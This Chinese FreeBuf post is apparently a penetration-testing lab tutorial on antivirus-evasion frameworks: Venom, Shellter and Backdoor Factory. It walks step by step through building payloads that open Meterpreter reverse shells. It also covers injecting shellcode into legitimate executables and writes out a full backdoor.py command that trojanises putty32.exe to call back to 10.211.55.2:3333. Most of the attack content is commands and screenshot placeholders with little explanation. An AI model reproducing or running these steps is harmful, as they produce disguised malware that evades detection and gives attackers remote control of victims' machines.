freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day11-免杀框架
2020-11-16 14:36:49

免杀框架

1. venom框架

cd venom进入venom文件夹中./venom.sh进入venom框架中

选择2进入windows的payload模块

wps122

再次2选择dll的shell编码格式

wps123

输入要反弹到的ip地址

wps124

输入端口

wps125

选择payload

wps126

填写生成文件的文件名

wps127

选择文件后缀

wps128

选择下发方式

wps129

这里选择手动下放进行测试,将两个文件复制粘贴到靶机上

wps130

运行installer.bat,显示成功反弹meterpreter会话

wps131

选择8进入逃避恶意接口检测的payload

wps132

接着选择4选择返回meterpreter会话

wps133

wps134

wps135

将bat和ps1放到同一个文件夹下运行bat文件

wps136

成功反弹meterpreter会话

wps137

2. shelltel框架

windows下直接双击shellter.exe

wps138

A:自动选择shellcode

M:手动配置参数

H:help

选择A自动选择shellcode,N不检查当前版本

wps139

输入要注入的程序

wps140

首先会把pe文件备份到shellter-backups文件夹下,原本的文件被覆盖了。

wps141

是否启用隐藏模块(这里选择不启用N)

wps142

选择payload模块

wps143

输入ip和端口

wps144

双击被注入的程序程序

wps145

成功反弹会话

wps146

3. backdoor factory(BDP)

检测pe文件是否允许注入shellcode

wps147

./backdoor.py -f ../putty32.exe -S

-f:要注入的pe文件

-c:code cave(代码裂缝)

-l:代码裂缝⼤⼩

-s:选择使⽤ payload 类型

-S:检测pe文件是否支持注入shellcode

-H:选择回连服务器地址

-P:回连服务器端⼝

-J:使⽤多代码裂缝注⼊

探测可注入的裂缝大小

wps148

./backdoor.py -f ../putty32.exe -c -l 200

查看可用的payload

wps149

wps150

./backdoor.py -f ../putty32.exe -s show

生成免杀pe文件

wps151

./backdoor.py -f ../putty32.exe -s iat_reverse_tcp_stager_threaded -H 10.211.55.2 -P 3333 -J -o payload.exe

成功运行putty32并且反弹会话

wps152

wps153

本文作者:, 转载请注明来自FreeBuf.COM

# 内网渗透 # 免杀工具
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑